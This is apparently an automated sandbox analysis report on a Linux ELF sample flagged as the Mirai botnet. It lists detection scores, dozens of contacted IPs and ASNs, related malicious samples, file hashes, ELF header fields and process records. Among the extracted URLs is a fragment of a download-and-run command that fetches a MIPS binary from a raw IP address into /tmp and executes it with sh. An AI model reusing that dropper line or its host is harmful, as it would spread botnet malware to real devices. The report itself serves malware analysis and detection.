    Local AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureTraffic Duplication2
    Application Layer Protocol
    Data DestructionVirtual Private ServerEmployee Names
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1345555 Sample: m1vvw0vLkD.elf Startdate: 21/11/2023 Architecture: LINUX Score: 76 22 5.17.173.50 ZTELECOM-ASRU Russian Federation 2->22 24 168.217.91.221 WVNETUS Australia 2->24 26 98 other IPs or domains 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 Yara detected Mirai 2->32 34 3 other signatures 2->34 8 m1vvw0vLkD.elf 2->8         started        signatures3 process4 process5 10 m1vvw0vLkD.elf 8->10         started        12 m1vvw0vLkD.elf 8->12         started        process6 14 m1vvw0vLkD.elf 10->14         started        16 m1vvw0vLkD.elf 10->16         started        18 m1vvw0vLkD.elf 10->18         started        20 m1vvw0vLkD.elf 10->20         started       

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    m1vvw0vLkD.elf32%ReversingLabsLinux.Trojan.Mirai
    m1vvw0vLkD.elf35%VirustotalBrowse
    m1vvw0vLkD.elf100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    NameSourceMaliciousAntivirus DetectionReputation
    http://upx.sf.netm1vvw0vLkD.elffalse
      high
      http://45.88.90.129/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114m1vvw0vLkD.elf, 5516.1.0000000000400000.0000000000411000.r-x.sdmpfalse
        unknown
        http://45.88.90.129/bins/Rakitin.shm1vvw0vLkD.elf, 5516.1.0000000000400000.0000000000411000.r-x.sdmpfalse
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          104.97.147.134
          unknownUnited States
          20940AKAMAI-ASN1EUfalse
          213.224.55.88
          unknownBelgium
          6848TELENET-ASBEfalse
          62.155.238.229
          unknownGermany
          3320DTAGInternetserviceprovideroperationsDEfalse
          192.102.228.154
          unknownUnited Kingdom
          15557LDCOMNETFRfalse
          213.243.254.25
          unknownItaly
          29050TERRECABLATETerrecablateRetieServiziSrlITfalse
          62.74.8.177
          unknownGreece
          12361PANAFONET-ASAthensGreeceGRfalse
          132.11.67.10
          unknownUnited States
          367DNIC-ASBLK-00306-00371USfalse
          62.13.69.237
          unknownSweden
          2119TELENOR-NEXTELTelenorNorgeASNOfalse
          62.83.246.155
          unknownSpain
          12430VODAFONE_ESESfalse
          212.225.65.98
          unknownUnited Kingdom
          2529DEMON-INTERNETNowmaintainedbyCableWirelessWorldwidefalse
          17.231.178.241
          unknownUnited States
          714APPLE-ENGINEERINGUSfalse
          162.143.175.224
          unknownUnited States
          394283BEACON-HEALTH-SYSTEMUSfalse
          213.41.59.84
          unknownUnited Kingdom
          8220COLTCOLTTechnologyServicesGroupLimitedGBfalse
          213.65.26.96
          unknownSweden
          3301TELIANET-SWEDENTeliaCompanySEfalse
          213.1.72.65
          unknownUnited Kingdom
          2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
          118.218.87.19
          unknownKorea Republic of
          9318SKB-ASSKBroadbandCoLtdKRfalse
          62.40.187.87
          unknownAustria
          8339KABSI-ASATfalse
          120.241.244.145
          unknownChina
          56040CMNET-GUANGDONG-APChinaMobilecommunicationscorporationfalse
          73.83.101.99
          unknownUnited States
          7922COMCAST-7922USfalse
          213.166.86.23
          unknownNetherlands
          207083HOSTSLIM-GLOBAL-NETWORKNLfalse
          178.214.2.136
          unknownPoland
          51390MTMINFO-ASPLfalse
          154.247.55.147
          unknownAlgeria
          36947ALGTEL-ASDZfalse
          75.119.231.187
          unknownCanada
          5645TEKSAVVYCAfalse
          135.73.117.238
          unknownUnited States
          18676AVAYAUSfalse
          92.223.234.6
          unknownItaly
          12874FASTWEBITfalse
          181.101.56.100
          unknownArgentina
          7303TelecomArgentinaSAARfalse
          213.235.199.128
          unknownAustria
          8437UTA-ASATfalse
          173.87.1.232
          unknownUnited States
          5650FRONTIER-FRTRUSfalse
          187.121.108.29
          unknownBrazil
          19182TELEFONICABRASILSABRfalse
          178.95.206.201
          unknownUkraine
          6849UKRTELNETUAfalse
          185.22.127.130
          unknownCzech Republic
          33883TRIONET-CZ-ASNIXCZfalse
          213.211.208.255
          unknownGermany
          43341MDLINKMDlinkonlineservicecenterGmbHDEfalse
          213.200.224.24
          unknownSwitzerland
          3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
          168.217.91.221
          unknownAustralia
          7925WVNETUSfalse
          31.119.143.110
          unknownUnited Kingdom
          12576EELtdGBfalse
          181.186.201.140
          unknownVenezuela
          262210VIETTELPERUSACPEfalse
          181.255.46.157
          unknownColombia
          26611COMCELSACOfalse
          118.173.29.80
          unknownThailand
          23969TOT-NETTOTPublicCompanyLimitedTHfalse
          5.205.27.184
          unknownSpain
          3352TELEFONICA_DE_ESPANAESfalse
          5.81.121.59
          unknownUnited Kingdom
          2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
          178.81.128.53
          unknownSaudi Arabia
          35819MOBILY-ASEtihadEtisalatCompanyMobilySAfalse
          136.240.225.21
          unknownUnited States
          22174NET-SUC-TECH-ALFUSfalse
          212.218.3.68
          unknownGermany
          8319NETHINKS-ASNETHINKSGmbHDEfalse
          87.22.58.62
          unknownItaly
          3269ASN-IBSNAZITfalse
          42.41.3.51
          unknownKorea Republic of
          9644SKTELECOM-NET-ASSKTelecomKRfalse
          181.19.238.232
          unknownVenezuela
          27889TelecomunicacionesMOVILNETVEfalse
          178.221.188.139
          unknownSerbia
          8400TELEKOM-ASRSfalse
          5.224.64.15
          unknownSpain
          12430VODAFONE_ESESfalse
          122.252.125.98
          unknownKorea Republic of
          18318SPEEDON-AS-KRLGHelloVisionCorpKRfalse
          195.45.166.70
          unknownItaly
          1267ASN-WINDTREIUNETEUfalse
          182.75.173.234
          unknownIndia
          9498BBIL-APBHARTIAirtelLtdINfalse
          192.236.176.254
          unknownUnited States
          54290HOSTWINDSUSfalse
          118.163.175.184
          unknownTaiwan; Republic of China (ROC)
          3462HINETDataCommunicationBusinessGroupTWfalse
          178.78.83.199
          unknownUnited Kingdom
          12390KINGSTON-UK-ASGBfalse
          213.167.30.150
          unknownBulgaria
          28909BG-TVSAT-ASBGfalse
          4.106.55.153
          unknownUnited States
          3356LEVEL3USfalse
          181.240.78.161
          unknownColombia
          26611COMCELSACOfalse
          42.129.237.19
          unknownChina
          4249LILLY-ASUSfalse
          118.0.152.4
          unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
          178.150.123.183
          unknownUkraine
          13188TRIOLANUAfalse
          213.49.139.177
          unknownBelgium
          5432PROXIMUS-ISP-ASBEfalse
          213.180.97.140
          unknownLatvia
          20910BALTKOM-ASLVfalse
          178.153.204.198
          unknownQatar
          42298GCC-MPLS-PEERINGGCCMPLSpeeringQAfalse
          131.63.188.129
          unknownUnited States
          386AFCONC-BLOCK1-ASUSfalse
          99.169.235.212
          unknownUnited States
          7018ATT-INTERNET4USfalse
          98.162.79.44
          unknownUnited States
          22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
          178.0.131.0
          unknownGermany
          3209VODANETInternationalIP-BackboneofVodafoneDEfalse
          181.49.35.216
          unknownColombia
          14080TelmexColombiaSACOfalse
          118.143.115.203
          unknownHong Kong
          9304HUTCHISON-AS-APHGCGlobalCommunicationsLimitedHKfalse
          5.17.173.50
          unknownRussian Federation
          41733ZTELECOM-ASRUfalse
          62.53.214.86
          unknownGermany
          6805TDDE-ASN1DEfalse
          178.30.28.83
          unknownSweden
          2119TELENOR-NEXTELTelenorNorgeASNOfalse
          178.27.198.182
          unknownGermany
          31334KABELDEUTSCHLAND-ASDEfalse
          118.4.170.105
          unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
          109.253.206.17
          unknownIsrael
          1680NV-ASNCELLCOMltdILfalse
          184.154.183.254
          unknownUnited States
          32475SINGLEHOP-LLCUSfalse
          212.221.104.219
          unknownBelgium
          3257GTT-BACKBONEGTTDEfalse
          213.139.212.76
          unknownUkraine
          208405SINET-ISP-ASUAfalse
          62.86.66.182
          unknownItaly
          3269ASN-IBSNAZITfalse
          46.181.54.185
          unknownRussian Federation
          39927ELIGHT-ASRUfalse
          59.60.148.96
          unknownChina
          4809CHINATELECOM-CORE-WAN-CN2ChinaTelecomNextGenerationCarrfalse
          8.195.50.16
          unknownUnited States
          3356LEVEL3USfalse
          213.111.222.141
          unknownUkraine
          3326DATAGROUPDatagroupPJSCUAfalse
          62.76.192.69
          unknownRussian Federation
          200135FLEXSOFT-ASRUfalse
          62.147.6.229
          unknownFrance
          12322PROXADFRfalse
          212.147.34.19
          unknownSwitzerland
          12350VTX-NETWORKCHfalse
          62.215.172.29
          unknownKuwait
          21050FAST-TELCOKWfalse
          213.115.153.143
          unknownSweden
          2119TELENOR-NEXTELTelenorNorgeASNOfalse
          46.80.202.244
          unknownGermany
          3320DTAGInternetserviceprovideroperationsDEfalse
          42.130.115.98
          unknownChina
          4249LILLY-ASUSfalse
          178.126.151.185
          unknownBelarus
          6697BELPAK-ASBELPAKBYfalse
          69.174.140.62
          unknownUnited States
          30600AS-CMNUSfalse
          42.168.124.197
          unknownChina
          4249LILLY-ASUSfalse
          9.36.142.238
          unknownUnited States
          3356LEVEL3USfalse
          97.238.164.133
          unknownUnited States
          6167CELLCO-PARTUSfalse
          181.240.78.183
          unknownColombia
          26611COMCELSACOfalse
          178.76.5.164
          unknownAzerbaijan
          1299TELIANETTeliaCarrierEUfalse
          178.66.27.16
          unknownRussian Federation
          12389ROSTELECOM-ASRUfalse
          62.153.147.191
          unknownGermany
          3320DTAGInternetserviceprovideroperationsDEfalse
          62.140.160.229
          unknownNetherlands
          28995ANTHOS-ASAnthosAmsterdamprovidesservicesforseveralintfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          62.155.238.229rXm4QSWGDYGet hashmaliciousMiraiBrowse
            213.243.254.25sora.arm.elfGet hashmaliciousMiraiBrowse
              7L6TBFQZtTGet hashmaliciousMiraiBrowse
                213.41.59.84HCyigyiCAHGet hashmaliciousMiraiBrowse
                  213.65.26.9641TU3CM3yIGet hashmaliciousMiraiBrowse
                    y4RMFYttsSGet hashmaliciousMiraiBrowse
                      213.1.72.65home.x86_64Get hashmaliciousMiraiBrowse
                        62.74.8.177XP3V62wHRH.elfGet hashmaliciousMiraiBrowse
                          tjNQ8Zdo5vGet hashmaliciousMiraiBrowse
                            KUsWGCcHaLGet hashmaliciousMiraiBrowse
                              132.11.67.107bgk8Yuv7TGet hashmaliciousMiraiBrowse
                                oaG6jOntjLGet hashmaliciousMiraiBrowse
                                  62.13.69.237yCPBmhRoel.elfGet hashmaliciousMiraiBrowse
                                    OI5ufLf4zsGet hashmaliciousMiraiBrowse
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      DTAGInternetserviceprovideroperationsDEgUuUJFJB45.elfGet hashmaliciousUnknownBrowse
                                      • 84.187.183.78
                                      arm.elfGet hashmaliciousMiraiBrowse
                                      • 46.92.18.172
                                      x86.elfGet hashmaliciousMiraiBrowse
                                      • 79.199.227.246
                                      GpREKk6uyn.elfGet hashmaliciousMiraiBrowse
                                      • 31.253.219.168
                                      KYuuWAo3C1.elfGet hashmaliciousMiraiBrowse
                                      • 2.161.196.138
                                      uKWWGpGChG.elfGet hashmaliciousMiraiBrowse
                                      • 93.202.104.141
                                      oLX4FU0V2k.elfGet hashmaliciousMiraiBrowse
                                      • 93.215.40.173
                                      3VNmL4P4sG.elfGet hashmaliciousMiraiBrowse
                                      • 80.132.249.100
                                      e3cfLPf0Ti.elfGet hashmaliciousMiraiBrowse
                                      • 87.173.156.14
                                      jo7EyIiUsZ.elfGet hashmaliciousMiraiBrowse
                                      • 93.224.206.99
                                      cool.x86.elfGet hashmaliciousUnknownBrowse
                                      • 87.172.6.244
                                      2jtSIERpll.elfGet hashmaliciousMiraiBrowse
                                      • 91.39.242.10
                                      0MNcEkBEXT.elfGet hashmaliciousMiraiBrowse
                                      • 2.165.219.148
                                      sora.arm.elfGet hashmaliciousMiraiBrowse
                                      • 217.229.172.212
                                      OcP69T7wlk.elfGet hashmaliciousMiraiBrowse
                                      • 46.78.19.161
                                      ovAcQ7CI4t.elfGet hashmaliciousMiraiBrowse
                                      • 84.174.23.218
                                      Bt4Vc4lw3J.elfGet hashmaliciousMiraiBrowse
                                      • 37.90.150.231
                                      SEknxSwJI2.elfGet hashmaliciousMiraiBrowse
                                      • 91.9.136.230
                                      0XslZyQiG0.elfGet hashmaliciousMiraiBrowse
                                      • 31.238.25.125
                                      ud704TETEP.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRATBrowse
                                      • 87.168.177.66
                                      AKAMAI-ASN1EUhttps://rjtlawfirm.sharefile.com/d-9543a8d6e3f84dafGet hashmaliciousHTMLPhisherBrowse
                                      • 23.48.8.182
                                      file.exeGet hashmaliciousGlupteba, VidarBrowse
                                      • 23.48.104.104
                                      https://app.box.com/s/ac9nub4b2vaq9ovs9cq2h0pcn5kdn48tGet hashmaliciousHTMLPhisherBrowse
                                      • 23.207.202.10
                                      Return Check.htmlGet hashmaliciousUnknownBrowse
                                      • 104.71.130.72
                                      possible_malware.exeGet hashmaliciousVidarBrowse
                                      • 104.127.87.210
                                      possible_malware.exeGet hashmaliciousVidarBrowse
                                      • 104.127.87.210
                                      G7DyaA9iz9.exeGet hashmaliciousPushdoBrowse
                                      • 172.234.25.151
                                      Fax-399383-3003-30393.xlsxGet hashmaliciousUnknownBrowse
                                      • 23.199.63.83
                                      InvoiceINV SI2650202.htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 23.48.104.8
                                      https://stearncommutity.ru/profiles/666061199495928728Get hashmaliciousUnknownBrowse
                                      • 23.45.180.217
                                      file.exeGet hashmaliciousGlupteba, Neoreklami, VidarBrowse
                                      • 23.44.203.142
                                      https://att-108191.weeblysite.com/Get hashmaliciousUnknownBrowse
                                      • 104.86.182.50
                                      https://znxbamdkwjcbas2562.top/Get hashmaliciousHTMLPhisherBrowse
                                      • 104.86.182.73
                                      https://att-100016.weeblysite.com/Get hashmaliciousUnknownBrowse
                                      • 104.86.182.24
                                      https://mail.thesteampowered.help/Get hashmaliciousUnknownBrowse
                                      • 23.215.176.17
                                      https://thesteampowered.help/Get hashmaliciousUnknownBrowse
                                      • 23.215.176.41
                                      http://stearncomrniunitly.ru/Get hashmaliciousUnknownBrowse
                                      • 23.215.176.41
                                      7AoKHkC5B8.exeGet hashmaliciousMystic StealerBrowse
                                      • 23.41.4.203
                                      mV94r2Q0Sx.exeGet hashmaliciousMystic StealerBrowse
                                      • 23.41.4.210
                                      RuoG5r34jc.exeGet hashmaliciousGlupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                      • 104.127.87.210
                                      TELENET-ASBEGpREKk6uyn.elfGet hashmaliciousMiraiBrowse
                                      • 213.224.56.222
                                      49WzaP1GI2.elfGet hashmaliciousMiraiBrowse
                                      • 212.123.18.55
                                      sora.arm.elfGet hashmaliciousMiraiBrowse
                                      • 84.192.109.23
                                      mods.arm7.elfGet hashmaliciousMiraiBrowse
                                      • 94.225.132.66
                                      8zb8fo2h7Z.elfGet hashmaliciousMiraiBrowse
                                      • 213.224.80.79
                                      fAhViHnmQs.elfGet hashmaliciousMiraiBrowse
                                      • 213.224.80.32
                                      Eypxe2gysn.elfGet hashmaliciousMiraiBrowse
                                      • 178.118.123.7
                                      j5jq1GszFD.elfGet hashmaliciousMiraiBrowse
                                      • 213.119.135.90
                                      cftC4CPqeq.elfGet hashmaliciousMiraiBrowse
                                      • 94.225.132.61
                                      JKtUqTCOma.elfGet hashmaliciousMiraiBrowse
                                      • 178.118.172.222
                                      YuynHebLPH.elfGet hashmaliciousMiraiBrowse
                                      • 84.197.231.108
                                      73gEIiRcbW.elfGet hashmaliciousMiraiBrowse
                                      • 213.119.135.87
                                      enYTIDNSNe.elfGet hashmaliciousMiraiBrowse
                                      • 213.224.55.80
                                      ZC0XIKa5GN.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 213.118.92.4
                                      skid.x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 212.123.18.67
                                      J4oa31mXHl.elfGet hashmaliciousMiraiBrowse
                                      • 213.224.80.69
                                      wQb9yR6USY.elfGet hashmaliciousMiraiBrowse
                                      • 213.119.160.52
                                      9Irkmiibym.elfGet hashmaliciousMiraiBrowse
                                      • 94.227.247.102
                                      QISOVbNi9M.elfGet hashmaliciousMiraiBrowse
                                      • 94.224.166.126
                                      0bHPV0WJr8.elfGet hashmaliciousMiraiBrowse
                                      • 94.225.107.57
                                      No context
                                      No context
                                      No created / dropped files found
                                      File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
                                      Entropy (8bit):7.9481655298696605
                                      TrID:
                                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                      File name:m1vvw0vLkD.elf
                                      File size:31'252 bytes
                                      MD5:453686399d2b48540e597f8b122cf7de
                                      SHA1:fd076a2b2f0509ae92a1e60b3462faebb992521d
                                      SHA256:d3a0623aeda320d3e2cf668cabcedc2dc06cba5adb33613d55e493d0e66811c3
                                      SHA512:ff44681e709317c8c969d8c5e552fde1649760781a3948d4dfea6e7d4c6c2649449aa5eccd33897910e36346153fe3faf4bb55219adb1a971c791a78b7598868
                                      SSDEEP:768:JfhMWzU6pMIwM4PI0U/epGjI5IGnYO59aq7rx0Ku:JfhMWfp2e/I5vYOLFPu
                                      TLSH:DAE2D073606B9178E879BB76001236C0FA9B6D4C45525BFB846EB93E0CB324D2B56BD0
                                      File Content Preview:.ELF..............>......g......@...................@.8...@......................................y.......y................................Q.......Q.............................Q.td.....................................................G,pUPX!H.......`...`..

                                      ELF header

                                      Class:ELF64
                                      Data:2's complement, little endian
                                      Version:1 (current)
                                      Machine:Advanced Micro Devices X86-64
                                      Version Number:0x1
                                      Type:EXEC (Executable file)
                                      OS/ABI:UNIX - System V
                                      ABI Version:0
                                      Entry Point Address:0x1067e0
                                      Flags:0x0
                                      ELF Header Size:64
                                      Program Header Offset:64
                                      Program Header Size:56
                                      Number of Program Headers:3
                                      Section Header Offset:0
                                      Section Header Size:64
                                      Number of Section Headers:0
                                      Header String Table Index:0
                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                      LOAD0x00x1000000x1000000x791c0x791c7.95130x5R E0x100000
                                      LOAD0x6880x5116880x5116880x00x00.00000x6RW 0x1000
                                      GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                      Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

                                      System Behavior

                                      Start time (UTC):02:10:41
                                      Start date (UTC):21/11/2023
                                      Path:/tmp/m1vvw0vLkD.elf
                                      Arguments:/tmp/m1vvw0vLkD.elf
                                      File size:31252 bytes
                                      MD5 hash:453686399d2b48540e597f8b122cf7de

                                      Start time (UTC):02:10:41
                                      Start date (UTC):21/11/2023
                                      Path:/tmp/m1vvw0vLkD.elf
                                      Arguments:-
                                      File size:31252 bytes
                                      MD5 hash:453686399d2b48540e597f8b122cf7de

                                      Start time (UTC):02:10:41
                                      Start date (UTC):21/11/2023
                                      Path:/tmp/m1vvw0vLkD.elf
                                      Arguments:-
                                      File size:31252 bytes
                                      MD5 hash:453686399d2b48540e597f8b122cf7de

                                      Start time (UTC):02:10:41
                                      Start date (UTC):21/11/2023
                                      Path:/tmp/m1vvw0vLkD.elf
                                      Arguments:-
                                      File size:31252 bytes
                                      MD5 hash:453686399d2b48540e597f8b122cf7de
                                      Start time (UTC):02:10:41
                                      Start date (UTC):21/11/2023
                                      Path:/tmp/m1vvw0vLkD.elf
                                      Arguments:-
                                      File size:31252 bytes
                                      MD5 hash:453686399d2b48540e597f8b122cf7de
                                      Start time (UTC):02:10:41
                                      Start date (UTC):21/11/2023
                                      Path:/tmp/m1vvw0vLkD.elf
                                      Arguments:-
                                      File size:31252 bytes
                                      MD5 hash:453686399d2b48540e597f8b122cf7de

                                      Start time (UTC):02:10:41
                                      Start date (UTC):21/11/2023
                                      Path:/tmp/m1vvw0vLkD.elf
                                      Arguments:-
                                      File size:31252 bytes
                                      MD5 hash:453686399d2b48540e597f8b122cf7de